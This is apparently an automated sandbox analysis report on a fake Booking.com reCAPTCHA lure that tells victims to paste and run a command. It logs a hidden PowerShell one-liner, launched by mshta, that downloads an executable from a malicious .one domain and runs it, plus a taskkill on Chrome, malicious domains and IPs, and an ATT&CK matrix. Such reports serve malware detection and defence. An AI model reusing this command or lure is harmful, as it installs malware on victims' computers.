      Source: C:\Users\user\AppData\Local\Temp\downloaded.exeSection loaded: uxtheme.dll
      Source: C:\Users\user\AppData\Local\Temp\downloaded.exeSection loaded: propsys.dll
      Source: C:\Users\user\AppData\Local\Temp\downloaded.exeSection loaded: linkinfo.dll
      Source: C:\Users\user\AppData\Local\Temp\downloaded.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
      Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
      Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
      Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
      Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32
      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

      Data Obfuscation

      barindex
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "$url='https://account.order921739128391.one/downloadExe'; $tempPath=[IO.Path]::GetTempPath(); $fileName='downloaded.exe'; $destination=Join-Path $tempPath $fileName; Invoke-WebRequest -Uri $url -OutFile $destination; Start-Process $destination"
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "$url='https://account.order921739128391.one/downloadExe'; $tempPath=[IO.Path]::GetTempPath(); $fileName='downloaded.exe'; $destination=Join-Path $tempPath $fileName; Invoke-WebRequest -Uri $url -OutFile $destination; Start-Process $destination"

      Persistence and Installation Behavior

      barindex
      Source: Chrome DOM: 3.5OCR Text: Booking.com I'm not a robot reCAPTCHA Verification Steps 1. Press Windows Button 2. Press CTRL + V 3. Press Enter
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\downloaded.exeJump to dropped file
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\downloaded.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8580
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1284
      Source: C:\Windows\System32\svchost.exe TID: 7148Thread sleep time: -30000s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3812Thread sleep count: 8580 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3812Thread sleep count: 1284 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7480Thread sleep time: -3689348814741908s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1996Thread sleep time: -1844674407370954s >= -30000s
      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
      Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "$url='https://account.order921739128391.one/downloadExe'; $tempPath=[IO.Path]::GetTempPath(); $fileName='downloaded.exe'; $destination=Join-Path $tempPath $fileName; Invoke-WebRequest -Uri $url -OutFile $destination; Start-Process $destination"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\downloaded.exe "C:\Users\user\AppData\Local\Temp\downloaded.exe"
      Source: C:\Users\user\AppData\Local\Temp\downloaded.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /F /IM chrome.exe
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -command "$url='https://account.order921739128391.one/downloadexe'; $temppath=[io.path]::gettemppath(); $filename='downloaded.exe'; $destination=join-path $temppath $filename; invoke-webrequest -uri $url -outfile $destination; start-process $destination"
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -command "$url='https://account.order921739128391.one/downloadexe'; $temppath=[io.path]::gettemppath(); $filename='downloaded.exe'; $destination=join-path $temppath $filename; invoke-webrequest -uri $url -outfile $destination; start-process $destination"
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Windows Management Instrumentation
      2
      Browser Extensions
      11
      Process Injection
      11
      Masquerading
      OS Credential Dumping1
      Security Software Discovery
      Remote Services1
      Email Collection
      2
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts1
      Command and Scripting Interpreter
      1
      Registry Run Keys / Startup Folder
      1
      Registry Run Keys / Startup Folder
      1
      Disable or Modify Tools
      LSASS Memory1
      Process Discovery
      Remote Desktop ProtocolData from Removable Media1
      Non-Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts2
      PowerShell
      1
      DLL Side-Loading
      1
      DLL Side-Loading
      31
      Virtualization/Sandbox Evasion
      Security Account Manager31
      Virtualization/Sandbox Evasion
      SMB/Windows Admin SharesData from Network Shared Drive2
      Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
      Process Injection
      NTDS1
      Application Window Discovery
      Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      DLL Side-Loading
      LSA Secrets1
      File and Directory Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials24
      System Information Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      https://account.order129837129821.one0%Avira URL Cloudsafe
      https://account.order129837129821.one0%VirustotalBrowse
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      d2i5gg36g14bzn.cloudfront.net0%VirustotalBrowse
      No Antivirus matches
      NameIPActiveMaliciousAntivirus DetectionReputation
      d2i5gg36g14bzn.cloudfront.net
      18.165.220.54
      truefalseunknown
      a.nel.cloudflare.com
      35.190.80.1
      truefalse
        high
        account.order921739128391.one
        104.21.46.36
        truetrue
          unknown
          challenges.cloudflare.com
          104.18.95.41
          truefalse
            high
            www.google.com
            142.250.181.68
            truefalse
              high
              account.order129837129821.one
              172.67.139.99
              truetrue
                unknown
                q-xx.bstatic.com
                unknown
                unknownfalse
                  high
                  NameMaliciousAntivirus DetectionReputation
                  https://account.order129837129821.one/true
                    unknown
                    https://account.order129837129821.one/?__cf_chl_rt_tk=KDWa0..Fbck9hKg3sDTsmfFTAkMIOcfZRuzpR0xglnE-1733126008-1.0.1.1-uaZeYgkOrt8TwpiIVQbEaYAygZ1M.Dmza1AFtuMwn1Ifalse
                      unknown
                      https://account.order129837129821.one/?op_token=EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uNpHcNZxKQpxRpsgVvrpvGPgRnLUDYSvaUdgYIgOtjXVTOLKpYiIiXtWnEdZzxcPuHxUiswmsJIlLgVWFNSgOkCfebTMYMuZRfpYMUHcpYqRHSIzZIsEkkOxFDlQKEjjymsUGgAoZrWELfFdljVngIVrpkGrGpSxHfNZUkiMnOZfkHNRAERWEuvDBuUuCdXLZIVifZBtUFjPRkdIxBgJFWUMFhYyntGyaywfbXFlbuAVncbySWVguhfvhXMptrue
                        unknown
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        1.1.1.1
                        unknownAustralia
                        13335CLOUDFLARENETUSfalse
                        104.21.46.36
                        account.order921739128391.oneUnited States
                        13335CLOUDFLARENETUStrue
                        172.217.17.46
                        unknownUnited States
                        15169GOOGLEUSfalse
                        172.217.17.35
                        unknownUnited States
                        15169GOOGLEUSfalse
                        104.18.94.41
                        unknownUnited States
                        13335CLOUDFLARENETUSfalse
                        216.58.208.227
                        unknownUnited States
                        15169GOOGLEUSfalse
                        104.18.95.41
                        challenges.cloudflare.comUnited States
                        13335CLOUDFLARENETUSfalse
                        172.217.19.202
                        unknownUnited States
                        15169GOOGLEUSfalse
                        18.165.220.54
                        d2i5gg36g14bzn.cloudfront.netUnited States
                        3MIT-GATEWAYSUSfalse
                        23.218.208.109
                        unknownUnited States
                        6453AS6453USfalse
                        172.67.139.99
                        account.order129837129821.oneUnited States
                        13335CLOUDFLARENETUStrue
                        64.233.165.84
                        unknownUnited States
                        15169GOOGLEUSfalse
                        239.255.255.250
